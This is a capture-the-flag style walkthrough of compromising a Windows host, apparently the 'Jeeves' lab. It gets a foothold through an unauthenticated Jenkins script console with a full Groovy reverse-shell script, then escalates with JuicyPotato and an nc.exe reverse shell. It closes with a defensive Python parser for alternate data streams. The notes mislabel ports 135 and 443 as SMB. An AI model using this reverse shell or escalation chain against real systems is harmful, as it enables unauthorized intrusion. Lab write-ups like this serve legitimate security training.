# TAKEAWAYS

- Start with a small wordlist of approx. 30K entries, then step up to a large wordlist of over 100K entries
- Have multiple techniques for moving files to a Windows target
- Cycle through PowerShell options, `certutil`, and `smbserver`

---

# Discover ports & services

- `ping` test
![[images/Pasted image 20260310201755.png]]
	- NOTE: TTL is consistent with a Windows host
- `nmap` scan - light
![[images/Pasted image 20260310202026.png]]
- `nmap` scan - detailed
![[images/Pasted image 20260310202224.png]]
	- Ports 80, 50000: HTTP
	- Ports 135, 443: SMB

# Port 445: SMB anon login

- Failures
![[images/Pasted image 20260310202502.png]]
	- NOTE: Windows 10 Pro build 10586
![[images/Pasted image 20260310202715.png]]

# Port 80: Webserver

- Visit page
![[images/Pasted image 20260310202828.png]]
- Page source
![[images/Pasted image 20260310202841.png]]
- Request-Response in `burp`
![[images/Pasted image 20260310203126.png]]
- `whatweb` scan
![[images/Pasted image 20260310203407.png]]
- `Nikto` scan
![[images/Pasted image 20260310203814.png]]
- Directory fuzzing
	- raft-small lowercase
![[images/Pasted image 20260310203648.png]]
	- raft-medium
![[images/Pasted image 20260310203707.png]]
- Sub-domain fuzzing
	- top1million-5000
![[images/Pasted image 20260310203953.png]]
- SQLi attempt with `' 1=1 --`
![[images/Pasted image 20260310204107.png]]
	- Leaked stack trace disclosing the ASP.NET version and the MSSQL version

# Port 50000: Webserver

- Visit page
![[images/Pasted image 20260310204820.png]]
- Page source
![[images/Pasted image 20260310204837.png]]
- Review Jetty 9.4.z for vulns
![[images/Pasted image 20260310205209.png]]
- Request-Response in `burp`
![[images/Pasted image 20260310205318.png]]
- Directory fuzzing
	- raft-medium
![[images/Pasted image 20260310211038.png]]
	- 2.3-medium
![[images/Pasted image 20260310211020.png]]
	- Found `/askjeeves`
- Visit `http://TARGET:50000/askjeeves`
![[images/Pasted image 20260310211129.png]]
	- We are on a Jenkins CI/CD server
	- We are not logged in, but we can still reach the script console (no authentication is enforced on it)
![[images/Pasted image 20260310211200.png]]

---

# Foothold

- Insert a Groovy script for a Windows `cmd.exe` revshell as below

```groovy
String host="10.10.14.197";
int port=9443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();
s.close();
```

- BAM! We are on the box as `jeeves\kohsuke`
![[images/Pasted image 20260310212145.png]]
- Internal enum
	- Privs and groups
![[images/Pasted image 20260310212030.png]]
	- NOTE: We have `SeImpersonatePrivilege` --> potato attacks are on the table
	- `systeminfo`
![[images/Pasted image 20260310212216.png]]

---

# Privesc

## PrintSpoofer64

- Move `PrintSpoofer64.exe` and `nc.exe` to the target
	- Issues with `certutil`, and with falling back to PowerShell to move the files over HTTP
	- Try `smbserver`
![[images/Pasted image 20260310214604.png]]
- Run the command below on the Windows target

```cmd
.\PrintSpoofer64.exe -c "c:\users\public\nc.exe 10.10.14.197 9444 -e cmd.exe"
```

- Issues - won't run and no hit on the listener
![[images/Pasted image 20260310215313.png]]
- Try local privesc with the commands below

```cmd
:: check whether the Print Spooler service is running
sc query Spooler
PrintSpoofer64.exe -i -c cmd.exe
```

- Confirmed the `Spooler` service is running
![[images/Pasted image 20260313202324.png]]
- This is not going to work because we do not have GUI access (the `-i` option needs an interactive desktop)

## JuicyPotato

- Move `JuicyPotato.exe` and `nc.exe` to `%TEMP%`

```cmd
c:\Users\kohsuke\AppData\Local\Temp\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\Users\kohsuke\AppData\Local\Temp\nc.exe -e cmd.exe 10.10.14.197 9443" -t *
```

- That worked!
![[images/Pasted image 20260313203926.png]]
	- Needed the absolute full path
- Cannot directly read `root.txt`?
![[images/Pasted image 20260313204006.png]]
- Run `dir /r` to list alternate data streams
![[images/Pasted image 20260313204318.png]]
	- There it is, but how do we read it?
	- `type hm.txt:root.txt:$DATA` does not work
	- Try `more < hm.txt:root.txt:$DATA`
	- This is the ticket!
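The last step relies on NTFS alternate data streams (ADS): `dir /r` prints each named stream as an extra line carrying only a size and `<file>:<stream>:$DATA`, which is how `hm.txt:root.txt:$DATA` shows up. The parser below, an added example that is not part of the original note, turns saved `dir /r` output into a map of files to their hidden streams, so a defender reviewing a listing can spot data tucked into ADS rather than eyeballing the output. The sample listing is constructed (names, sizes and dates are made up, modelled on the note's `hm.txt` case); the `Zone.Identifier` allow-list is an assumption, that stream is the ordinary mark-of-the-web added to downloads, so it is not reported.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of `dir /r` output (not taken from the target; values are made up).
SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
11/08/2017  10:06 AM            12,288 notes.docx
                                    26 notes.docx:Zone.Identifier:$DATA
               3 File(s)         13,155 bytes
               2 Dir(s)  10,000,000,000 bytes free
"""

# A stream line in `dir /r` output has no date/time columns: only whitespace,
# a size, and "<file>:<stream>:$DATA". Regular file lines start with a date.
_STREAM_LINE = re.compile(
    r"^\s+(?P<size>[\d,]+)\s+(?P<file>[^:]+):(?P<stream>[^:]+):\$DATA\s*$"
)


def parse_ads(listing: str) -> Dict[str, List[Tuple[str, int]]]:
    """Map each file name to the (stream name, size) pairs found under it."""
    streams: Dict[str, List[Tuple[str, int]]] = {}
    for line in listing.splitlines():
        m = _STREAM_LINE.match(line)
        if not m:
            continue
        size = int(m.group("size").replace(",", ""))
        streams.setdefault(m.group("file"), []).append((m.group("stream"), size))
    return streams


# Assumed allow-list: Zone.Identifier is the mark-of-the-web stream that browsers
# attach to downloaded files, so it is expected and not worth flagging.
BENIGN_STREAMS = {"Zone.Identifier"}


def suspicious_streams(listing: str) -> List[Tuple[str, str, int]]:
    """Return (file, stream, size) for every named stream not on the allow-list."""
    hits: List[Tuple[str, str, int]] = []
    for fname, entries in parse_ads(listing).items():
        for stream, size in entries:
            if stream not in BENIGN_STREAMS:
                hits.append((fname, stream, size))
    return hits


if __name__ == "__main__":
    # Review the constructed listing; on a real box, feed it the saved `dir /r` output.
    for fname, stream, size in suspicious_streams(SAMPLE_DIR_R):
        print(f"{fname} carries hidden stream '{stream}' ({size} bytes)")
        # Contents can be viewed with:  more < "{fname}:{stream}:$DATA"
```

Note that `dir /r` only reveals streams on the files it lists; a stream attached to a directory entry or to a file in another folder needs its own listing, so run it per directory of interest when auditing.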